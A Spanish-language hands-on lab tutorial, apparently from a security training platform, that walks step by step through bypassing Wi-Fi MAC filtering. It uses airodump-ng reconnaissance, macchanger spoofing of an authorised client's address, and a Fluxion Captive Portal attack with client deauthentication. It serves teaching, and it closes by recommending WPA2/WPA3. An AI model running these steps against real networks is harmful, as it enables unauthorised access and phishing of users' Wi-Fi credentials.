Omitir el Filtrado de Direcciones MAC durante un Ataque

Beginner
Practicar Ahora

Introducción

El filtrado de direcciones MAC (Media Access Control) es una medida de seguridad de red en la que un router o punto de acceso (AP) se configura para aceptar tráfico solo de dispositivos con direcciones MAC específicas y preaprobadas. Si bien puede disuadir a intrusos casuales, esta capa de seguridad puede ser eludida mediante una técnica llamada suplantación de MAC (MAC spoofing).

En este laboratorio, aprenderá el proceso completo para eludir el filtrado de direcciones MAC. Primero identificará una red objetivo, encontrará la dirección MAC de un cliente ya autorizado y luego cambiará la dirección MAC de su propio adaptador inalámbrico para suplantar a ese cliente. Finalmente, verá cómo esto permite que una herramienta como Fluxion inicie con éxito un ataque que de otro modo estaría bloqueado. Este laboratorio tiene fines educativos para ayudarle a comprender las vulnerabilidades de red.

Identificar una Red que Potencialmente Utiliza Filtrado MAC

En este paso, instalará las herramientas necesarias y escaneará las redes inalámbricas cercanas. La primera parte de cualquier evaluación inalámbrica es el reconocimiento. Necesitamos ver qué redes están disponibles y elegir un objetivo.

Primero, actualicemos la lista de paquetes e instalemos el conjunto aircrack-ng, que contiene las herramientas que necesitamos para escanear.

sudo apt-get update
sudo apt-get install -y aircrack-ng

A continuación, deberá poner su adaptador inalámbrico en "modo monitor". Este modo permite que el adaptador capture todo el tráfico Wi-Fi en el aire, no solo el tráfico dirigido a él. En este entorno simulado, su adaptador inalámbrico se llama wlan0.

Ejecute el siguiente comando para iniciar el modo monitor:

sudo airmon-ng start wlan0

Debería ver una salida que indica que el modo monitor se ha habilitado. El comando también creará una nueva interfaz virtual, típicamente llamada wlan0mon.

PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Wireless
        (monitor mode enabled on wlan0mon)

Ahora, use airodump-ng con la nueva interfaz monitor (wlan0mon) para escanear todas las redes inalámbricas en rango.

sudo airodump-ng wlan0mon

Deje que el escaneo se ejecute durante un minuto. Verá una lista de puntos de acceso detectados. Para este laboratorio, asumiremos que nuestra red objetivo tiene el ESSID (nombre de red) "Target-Net". Presione Ctrl+C para detener el escaneo una vez que lo vea.

 CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10        0    0   6  54e  WPA2 CCMP   PSK  Target-Net
 F8:E4:3B:9A:1B:C0  -65        8        0    0   1  54e  WPA2 CCMP   PSK  Other-Net

De esta salida, anote el BSSID (00:11:22:33:44:55) y el CH (canal 6) de nuestra "Target-Net". Necesitaremos esta información en el siguiente paso.

Usar 'airodump-ng' para Encontrar la Dirección MAC de un Cliente Conectado

En este paso, centrará su escaneo en la red objetivo para identificar cualquier cliente que ya esté conectado. Para eludir el filtrado MAC, necesita suplantar un dispositivo que ya esté en la "lista de permitidos". Encontrar la dirección MAC de un cliente conectado es la clave para esto.

Usando el BSSID y el channel que identificó en el paso anterior, ejecute airodump-ng nuevamente. Esta vez, agregará opciones para filtrar el escaneo y mostrar solo información sobre nuestra red objetivo. Esto hace que la salida sea más limpia y le ayuda a encontrar clientes más fácilmente.

Reemplace 00:11:22:33:44:55 con el BSSID de su red objetivo y 6 con su canal.

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon

La salida se dividirá en dos partes. La parte superior muestra información sobre el Punto de Acceso (AP), y la parte inferior muestra los clientes conectados (estaciones).

 CH  6 ][ Elapsed: 25 s ][ 2023-10-27 10:32

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:11:22:33:44:55  -32  100       30       20    1   6  54e  WPA2 CCMP   PSK  Target-Net

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -40    1- 0      0       15

Mire la sección inferior bajo STATION. Esta es la dirección MAC de un cliente conectado al AP "Target-Net". En este ejemplo, la dirección MAC del cliente es AA:BB:CC:DD:EE:FF.

Copie esta dirección MAC de STATION. La usará en el siguiente paso para suplantar su propia dirección MAC. Una vez que tenga la dirección, puede detener el escaneo presionando Ctrl+C.

Usar 'macchanger' para Suplantar la MAC de su Adaptador por la MAC del Cliente

En este paso, cambiará la dirección MAC de su adaptador inalámbrico por la que capturó del cliente legítimo. Este proceso se llama suplantación de MAC (MAC spoofing).

Primero, necesita instalar macchanger, una utilidad simple para ver y manipular direcciones MAC.

sudo apt-get install -y macchanger

Antes de cambiar la dirección MAC, debe detener la interfaz en modo monitor y desactivar la interfaz inalámbrica física.

sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down

Ahora, use macchanger para establecer la nueva dirección MAC. Use la opción -m seguida de la dirección MAC del cliente que anotó en el paso anterior (AA:BB:CC:DD:EE:FF).

sudo macchanger -m AA:BB:CC:DD:EE:FF wlan0

La salida le mostrará la MAC original (Permanent) y confirmará la nueva MAC suplantada.

Current MAC:   00:0c:29:12:34:56 (unknown)
Permanent MAC: 00:0c:29:12:34:56 (unknown)
New MAC:       AA:BB:CC:DD:EE:FF (unknown)

Finalmente, reactive la interfaz inalámbrica para que los cambios surtan efecto.

sudo ifconfig wlan0 up

Puede verificar que la dirección MAC ha sido cambiada ejecutando ifconfig wlan0 y comprobando el campo ether. Su adaptador ahora está suplantando al cliente legítimo.

Lanzar el Ataque Fluxion con la Dirección MAC Suplantada

En este paso, lanzará una herramienta de ataque llamada Fluxion. El objetivo es demostrar que con su dirección MAC suplantada, la herramienta puede asociarse exitosamente con el AP objetivo, un paso que fallaría si la red estuviera usando filtrado MAC y usted tuviera una MAC aleatoria y no autorizada.

Primero, necesita descargar Fluxion de su repositorio oficial de GitHub.

git clone https://www.github.com/FluxionNetwork/fluxion.git

Navegue al directorio fluxion recién creado.

cd fluxion

Ahora, lance el script de Fluxion con privilegios de sudo.

sudo ./fluxion.sh

Fluxion es un script interactivo. Se le pedirá que realice varias selecciones. Siga estas indicaciones:

  1. Selección de Idioma: Presione Enter para seleccionar Inglés (o escriba el número correspondiente).
  2. Selección del Adaptador Inalámbrico: Fluxion detectará su adaptador wlan0. Selecciónelo escribiendo su número y presionando Enter.
  3. Selección de Canal: Elija la opción para escanear redes (por ejemplo, "All channels scanner").
  4. Selección del Objetivo: Después del escaneo, aparecerá una lista de redes. Busque "Target-Net" y escriba su número, luego presione Enter.
  5. Selección del Ataque: Elija un ataque. Para esta demostración, seleccione el ataque Captive Portal.
  6. Verificación del Handshake: Fluxion verificará si existe un archivo de handshake válido. Elija la opción para omitir o realizar un ataque de desautenticación para capturar uno.

La parte crucial de este paso es observar que Fluxion puede avanzar a través de estas etapas iniciales. Debido a que su dirección MAC ahora está en la "lista de permitidos" del AP, los intentos de Fluxion de comunicarse y asociarse con el AP tendrán éxito.

Verificar que el Ataque Procede Más Allá de la Etapa de Asociación

En este paso final, observará la salida de Fluxion para confirmar que la suplantación de MAC fue exitosa. No necesita completar el ataque completo; el objetivo es simplemente verificar que ha omitido la verificación de seguridad inicial.

Después de seleccionar el ataque Captive Portal en Fluxion, la herramienta comenzará su proceso. Debería ver mensajes en la terminal que indiquen que está:

  • Creando un punto de acceso (AP) falso.
  • Intentando desautenticar clientes del AP real.
  • Esperando a que un cliente se conecte al AP falso.

La observación clave aquí es la ausencia de un error de "fallo de asociación". Si hubiera intentado ejecutar este ataque sin suplantar su dirección MAC, Fluxion probablemente fallaría desde el principio porque el AP objetivo rechazaría cualquier intento de conexión de su dirección MAC no autorizada. El hecho de que el ataque proceda a la etapa de configuración de un AP falso y desautenticación de clientes es prueba de que ha omitido con éxito el filtro MAC.

Una vez que haya visto estos mensajes y confirmado que el ataque está en curso, puede detener el script de forma segura presionando Ctrl+C en la terminal.

Como una buena práctica final, siempre debe restaurar la dirección MAC original de su adaptador una vez que haya terminado.

Primero, desactive la interfaz:

sudo ifconfig wlan0 down

Use macchanger con la opción -p (permanent) para restaurar la dirección MAC original del hardware.

sudo macchanger -p wlan0

Finalmente, reactive la interfaz.

sudo ifconfig wlan0 up

Ahora ha demostrado con éxito cómo omitir el filtrado MAC y ha realizado la limpieza restaurando su configuración original.

Resumen

En este laboratorio, aprendió y ejecutó con éxito la técnica de omitir el filtrado de direcciones MAC en una red Wi-Fi.

Comenzó utilizando la suite aircrack-ng para escanear redes e identificar un objetivo. Luego se centró en ese objetivo con airodump-ng para encontrar la dirección MAC de un cliente ya autorizado. Usando macchanger, suplantó la dirección MAC de su adaptador inalámbrico para hacerse pasar por ese cliente. Finalmente, lanzó la herramienta Fluxion y verificó que el ataque podía proceder más allá de la etapa inicial de asociación, lo que demostró que la medida de seguridad de filtrado MAC había sido efectivamente omitida.

Esta experiencia práctica demuestra una vulnerabilidad común en la seguridad de redes y resalta la importancia de utilizar medidas de seguridad más sólidas, como WPA2/WPA3 con una contraseña fuerte, en lugar de depender de identificadores fácilmente suplantables como las direcciones MAC.